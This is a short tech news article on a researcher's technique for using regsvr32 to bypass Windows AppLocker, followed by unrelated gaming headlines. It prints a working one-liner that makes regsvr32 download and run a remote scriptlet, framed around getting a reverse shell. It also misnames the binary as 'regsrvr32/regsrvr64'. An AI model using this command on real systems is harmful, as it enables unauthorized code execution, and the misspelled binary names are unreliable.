A security researcher has found a vulnerability in Windows that could allow hackers to install malicious software on a computer without the user’s knowledge. Casey Smith, a researcher from Colorado, discovered that regsrvr32 (regsrvr64 in 64-bit versions) – a whitelisted function in Windows, dating back to Windows 7 – can be manipulated to bypass the AppLocker security restrictions on installing programs.
“So, I have been working this out the last few days. I was trying solve a particular problem,” Smith wrote on his blog. “I needed a reverse shell on workstation locked down by AppLocker executable and script rules enforced.”
Smith’s solution to the problem looked like this:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Effectively, he used a URL as a script, a function of regsvr that was not commonly known to exist.
“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc… And… You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” added Smith.
The crux of Smith’s discovery is, by using regsrvr32/regsrvr64, someone can remotely execute code on a Windows machine without triggering AppLocker. While Microsoft is yet to patch the flaw, anyone concern about it can disable regsvr in either Windows Firewall or their own third-party firewall.
Electronic Arts (EA) announced today that its games were played for over 11 billion hours…
Steam's annual end-of-year recap, Steam Replay, provides fascinating insights into gamer habits by comparing individual…
GSC GameWorld released a major title update for STALKER 2 this seeking, bringing the game…
Without any formal announcement, Intel appears to have revealed its new Core 200H series processors…
Ubisoft is not having the best of times, but despite recent flops, the company still…
If you haven’t started playing STALKER 2: Heart of Chornobyl yet, now might be the…